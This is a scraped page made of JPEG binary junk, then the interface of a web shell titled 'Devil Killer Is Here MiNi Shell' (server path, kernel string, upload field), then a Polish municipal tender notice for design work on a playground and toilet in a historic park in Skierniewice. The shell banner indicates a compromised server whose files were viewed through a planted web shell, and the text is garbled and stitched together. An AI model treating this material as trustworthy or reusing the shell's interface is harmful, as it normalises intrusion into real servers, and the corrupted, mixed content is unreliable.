JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140123/27186-N-2014.html

<p class="kh_header"><b>Skierniewice: Opracowanie dokumentacji technicznej dla realizacji zadania inwestycyjnego pn.    Budowa placu zabaw i toalety na terenie zabytkowego parku miejskiego w Skierniewicach</b><br>
<b>Numer ogłoszenia: 27186 - 2014; data zamieszczenia: 23.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej dla realizacji zadania inwestycyjnego pn.    Budowa placu zabaw i toalety na terenie zabytkowego parku miejskiego w Skierniewicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opracowanie dokumentacji technicznej dla realizacji zadania inwestycyjnego pn. Budowa placu zabaw i toalety na terenie zabytkowego parku miejskiego w Skierniewicach
2. Tryb udzielenia zamówienia:
Przetarg nieograniczony przeprowadzany jest na podstawie art. 39 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych  (Dz.U. z  2013 r. poz.907 z późniejszymi zmianami) zwaną dalej ustawą
3. Opis przedmiotu zamówienia:
3.1.Kod CPV:  
Kod CPV głównego przedmiotu to 
    71200000-0 Usługi architektoniczne i podobne
    71220000-0 Usługi projektowania architektonicznego w zakresie przestrzeni
    71240000-2 Usługi architektoniczne, inżynieryjne i planowania
    71400000-2 Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu
     71320000-7 Usługi inżynieryjne w zakresie projektowania
     71221000-3 Usługi architektoniczne w zakresie obiektów budowlanych
     74232000-6 Usługi projektowania architektonicznego

3.2.Przedmiotem zamówienia jest: wykonanie dokumentacji projektowej zgodnie z warunkami niniejszej SIWZ.
Zamówienie obejmuje: Wykonanie kompletnych, kompleksowych, wielobranżowych dokumentacji projektowych. Lokalizacja placu zabaw i toalety została wskazana w Koncepcji rewitalizacji zabytkowego parku miejskiego w Skierniewicach - dawnego ogrodu Prymasów Polski. Park miejski jest objęty ochroną konserwatorską.
Prace projektowe mają za zadanie wkomponowanie w historyczny charakter obiektu nowych elementów (plac zabaw i toaletę ogólnodostępną) związanych z jego funkcją - parku miejskiego.
Plac zabaw ma być przeznaczony dla dzieci najmłodszych i starszych.

W skład zamówienia wchodzi:
3.2.1. Opracowanie mapy d/c projektowych.
3.2.2. Opracowanie 2 wariantów koncepcji budowy placu zabaw wraz z zagospodarowaniem terenu, a także toalety w wersji graficznej i opisowej. Do każdego wariantu koncepcji należy przedstawić wizualizację oraz szacunkową wartość kosztów. Przed przystąpieniem do opracowania dokumentacji technicznej, Wykonawca zobowiązany jest uzgodnić koncepcję z Konserwatorem Zabytków. 
3.2.3. Opracowanie na podstawie wybranego przez Inwestora wariantu koncepcji, dokumentacji technicznej budowlanej i wykonawczej placu zabaw oraz toalety wraz z przyłączami i dojściami. Opracowana dokumentacja techniczna winna być również uzgodniona ze służbami konserwatorskimi. 
3.2.4. SWiOR, przedmiary robót, kosztorysy inwestorskie dla w/w opracowań.
3.2.5. Pełnienie nadzoru autorskiego w trakcie realizacji inwestycji. W przypadku wystąpienia błędów w dokumentacji projektowej, konieczności wykonania dodatkowych opracowań, a także w przypadku konieczności sporządzenia dokumentacji zamiennej, Wykonawca zobowiązany jest uzupełnić to w ramach kwoty umownej wynagrodzenia - nadzoru autorskiego. 
3.2.6. Zamówienie obejmuje również uzyskanie materiałów wyjściowych do projektowania, zaleceń konserwatorskich konserwatora zabytków do projektowania oraz uzyskanie wszystkich niezbędnych opinii, uzgodnień i decyzji administracyjnych.
3.2.7. Wykonawca zobowiązany jest do uzyskania pozwolenia na budowę.
3.2.8.Wykonawca zobowiązany będzie do udzielania pełnych wyjaśnień dotyczących dokumentacji projektowo - kosztorysowej na etapie postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych w terminie 3 dni od wezwania przez Zamawiającego, faxem lub pocztą elektroniczną.

4. Zakres ilościowy projektów :

1) Koncepcje budowy placu zabaw wraz z zagospodarowaniem terenu, a także toalety w wersji graficznej i opisowej wraz z wizualizacją oraz szacunkową wartością kosztów (dwie wersje)  - 2 egzemplarze w wersji papierowej i 1 egzemplarz w wersji elektronicznej.
2) Projekt budowlany i wykonawczy w tym BIOZ i niezbędne mapy, rysunki, uzgodnienia, opinie itp.- sporządzony zgodnie z obowiązującymi przepisami - 5 egzemplarzy w wersji papierowej i 1 egz. w wersji elektronicznej,
3) Przedmiary robót wg SST dla każdego projektu - 2 egzemplarze w wersji papierowej i 1 egzemplarz w wersji elektronicznej.
4) Kosztorys inwestorski  - sporządzony zgodnie z obowiązującymi przepisami w wersji papierowej - 2 egzemplarze i 1 egzemplarz w wersji elektronicznej.
5) Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót - 2 egzemplarze  w wersji papierowej i 1 egz. w wersji elektronicznej

5. Istotne informacje: 
5.1. Plac zabaw oraz toaleta winny być wkomponowane w historyczny charakter parku miejskiego. Park miejski, na terenie którego projektuje się nowe elementy, jest objęty ochroną konserwatorską.
5.2. Plac zabaw o nawierzchni bezpiecznej.
5.3. Podczas projektowania należy uwzględnić ogrodzenie placu zabaw.
5.4. Podczas projektowania należy uwzględnić wykonanie i zamontowanie tablicy informacyjnej, zawierającej regulamin określający zasady i warunki korzystania z placu zabaw oraz numery alarmowe, numer telefonu do Zarządcy placu zabaw oraz adres placu zabaw.
5.5. Urządzenia małej architektury powinny być połączone trwale z gruntem zgodnie z obowiązującymi normami. Wszystkie zaproponowane urządzenia i rozwiązania techniczne muszą spełniać wymogi obowiązujących norm i przepisów prawa.
5.6. Urządzenia małej architektury winny mieć wyznaczoną minimalną strefę bezpieczeństwa.  Nawierzchnia strefy bezpieczeństwa musi być zgodna z normami oraz z wysokością swobodnego upadku dostosowaną do wysokości proponowanych urządzeń.
5.7. Urządzenia małej architektury winny być wykonane z bezpiecznych i trwałych materiałów. Zastosowane materiały winny spełniać wymogi prawa budowlanego, tj. posiadać odpowiednie certyfikaty na znak bezpieczeństwa, być zgodne z wymogami technicznymi Polskich Norm lub aprobatą
techniczną, o ile dla danego wyrobu nie ustanowiono Polskiej Normy; wymagane są materiały atestowane i dopuszczone do stosowania.
5.8. Wszystkie montowane urządzenia i elementy wyposażenia placu zabaw muszą posiadać atesty i certyfikaty bezpieczeństwa potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie oraz posiadać dopuszczenie do stosowania w kontakcie z dziećmi.
5.9. Każde urządzenie powinno być oznaczone tabliczką znamionową zawierającą informację o producencie, dacie produkcji, numerze seryjnym i numerze normy, zgodnie z którą urządzenie wyprodukowano. Ponadto urządzenie powinno być trwale związane z gruntem.
5.10. Zamawiający wymaga, aby opracowanie było kompletnym materiałem, na podstawie którego Zamawiający będzie mógł przeprowadzić postępowanie przetargowe na wykonanie przedmiotowych obiektów.
5.11. Zamawiający wymaga aby dokumentacja była sporządzona zgodnie z wymogami prawa
zamówień publicznych, uwzględniając wszystkie wymagania i okoliczności mogące mieć wpływ na proces sporządzania oferty, a więc taki, który nie utrudni uczciwej konkurencji, zakazuje się wskazania znaków towarowych, patentów lub pochodzenia.
5.12. Dla przybliżenia istniejącego wyposażenia terenu i jego otoczenia w miejscu planowanej lokalizacji placu zabaw i toalety, załączono mapę terenu z Koncepcji rewitalizacji zabytkowego parku miejskiego w Skierniewicach - dawnego ogrodu Prymasów Polski. 
5.13. Zaleca się, aby wykonawca dokonał wizji lokalnej na terenie objętym dokumentacjami projektowymi, w celu oceny lokalnych warunków, a także analizy dokumentów i informacji przekazanych przez Zamawiającego w ramach niniejszego postępowania.

6. Zamawiający nie dopuszcza składania ofert częściowych. 

7. Zamawiający nie dopuszcza składania ofert wariantowych ani równoważnych.

8. Zamawiający nie przewiduje udzielenia zamówień uzupełniających.

9. Terminy realizacji:
9.1. W terminie do 14 dni od dnia podpisania umowy, należy przedłożyć zamawiającemu 2 wersje koncepcji budowy placu zabaw wraz z zagospodarowaniem terenu, a także toalety w wersji graficznej i opisowej wraz z wizualizacją oraz szacunkową wartością kosztów (dla każdej wersji)  - 2 egzemplarze w wersji papierowej i 1 egzemplarz w wersji elektronicznej.
9.2. W terminie 7 dni Zamawiający zapozna się z przesłanymi wariantami i zorganizuje w swojej siedzibie spotkanie, na który Wykonawca dokona prezentacji zaproponowanych wariantów. Dopuszczalna jest możliwość połączenia elementów dwóch zaproponowanych wariantów w trzeci do ostatecznego opracowania dokumentacji technicznej.
9.3. Wykonawca zobowiązuje się dostarczyć dokumentację projektową niezwłocznie po jej wykonaniu, celem poddania jej weryfikacji przez Zamawiającego pod względem merytorycznym na okres 7 dni roboczych.
9.4. W terminie 3 miesięcy od daty zatwierdzenia koncepcji przez Zamawiającego, Wykonawca winien przekazać Zamawiającemu dokumentację techniczną budowlaną i wykonawczą placu zabaw oraz toalety wraz z przyłączami, SWiOR, przedmiary robót, kosztorysy inwestorskie dla w/w opracowań wraz z decyzją - pozwolenie na budowę.
9.5. Miejscem odbioru opracowań będących przedmiotem niniejszego zamówienia będzie siedziba Zamawiającego. 

10. Źródła finansowania zadania: środki własne budżetu Miasta Skierniewice.

11. Wykonawca skieruje do wykonania przedmiotu zamówienia - wszystkich dokumentacji projektowych osoby posiadające odpowiednie uprawnienia do projektowania, w szczególności które zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5 poz. 42 z późn. zm.) posiadają odpowiednie uprawnienia projektowe, są członkami właściwej izby samorządu zawodowego oraz posiadają ubezpieczenie od odpowiedzialności cywilnej za szkody, do których może dojść w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.00.00-0, 71.24.00.00-2, 71.40.00.00-2, 71.32.00.00-7, 71.22.10.00-3, 74.23.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu nie ma obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Pzp oraz wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 ustawy a także dostarczą dokumenty wymagane w SIWZ. Na dowód tego Wykonawca winien załączyć do oferty oświadczenia - załącznik nr 2 i nr 3 do SIWZ oraz dokumenty wymagane w SIWZ. 
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek określony w art.22 ust.1 pkt 2 ustawy Pzp, dotyczący posiadania odpowiedniej wiedzy i doświadczenia Zamawiający uzna za spełniony jeżeli Wykonawca wykaże że wykonał w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej dwie usługi projektowe polegające na opracowaniu dokumentacji podobnej z rodzaju do przedmiotu zamówienia, każda o wartości minimum 15.000 zł netto. Przez usługi projektowe podobne z rodzaju i zakresu do przedmiotu zamówienia rozumie się projekt przynajmniej jednego placu zabaw i przynajmniej jeden projekt obiektu kubaturowego. Na dowód tego Wykonawca winien złożyć:  Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykaz musi potwierdzać, spełnienie warunku, o którym mowa w punkcie 12.2. SIWZ.
Wykaz należy sporządzić wg załącznika nr 4 do siwz. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek o którym mowa w art. 22 ust.1 pkt 3 ustawy pzp dotyczący dysponowania odpowiednim potencjałem technicznym, jeżeli wykonawca załączy do
do oferty oświadczenie -załącznik nr 2 do SIWZ. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący osób zdolnych do wykonania zamówienia, jeżeli Wykonawca załączy do oferty oświadczenie -załącznik nr 2 do SIWZ. Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek określony w art. 22 ust.1 pkt 4 ustawy Pzp, dotyczący sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony, gdy Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimalną 30.000,- zł. Na dowód tego Wykonawca winien załączyć: Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 30.000,-zł. 
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu będzie przeprowadzony w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia.
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia  - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ.
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22, ust. 1 Ustawy - wg wzoru stanowiącego załącznik nr 2 do SIWZ.
3.Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy - wg wzoru stanowiącego załącznik nr 3 do SIWZ.
4. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Wykaz musi potwierdzać, spełnienie warunku, o którym mowa w punkcie 12.2. SIWZ.
Wykaz należy sporządzić wg załącznika nr 4.
5.Informację o przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp wraz z listą podmiotów należących do tej samej grupy kapitałowej, lub informację o tym, że nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 5 do SIWZ. 
6. Pełnomocnictwo (gdy jest wymagane).
7.W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do oferty należy dołączyć dokumenty: 
- pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o którym mowa w art. 23 ustawy, 
- dokumenty wymienione w punktach od 18.c do 18.d i 18. f  siwz muszą być złożone przez każdy podmiot,                 
- pozostałe dokumenty wymienione w pkt. 18 siwz podmioty składają wspólnie jako konsorcjum,                    
- w przypadku ofert składanych wspólnie warunki zawarte w pkt. 18 siwz muszą być spełnione wspólnie lub przynajmniej przez jeden podmiot, o ile zamawiający nie zastrzegł inaczej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie: 
a) przedłużenia terminu realizacji,
b) terminów płatności,
c) zmiany stawki podatku VAT. 
Zamawiający może wyrazić zgodę na zmianę postanowień umowy pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (np.: zwłoka lub odmowa 
w wydawaniu uzgodnień i pozwoleń przez odpowiednie urzędy, konieczność usunięcia błędów w dokumentacji projektowej). Zmiana postanowień umowy może być dokonana tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, Wydział Inwestycji Kubaturowych (wejście od Placu św. Floriana, pokój nr 15).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2014 godzina 11:30, miejsce: Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, sekretariat pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

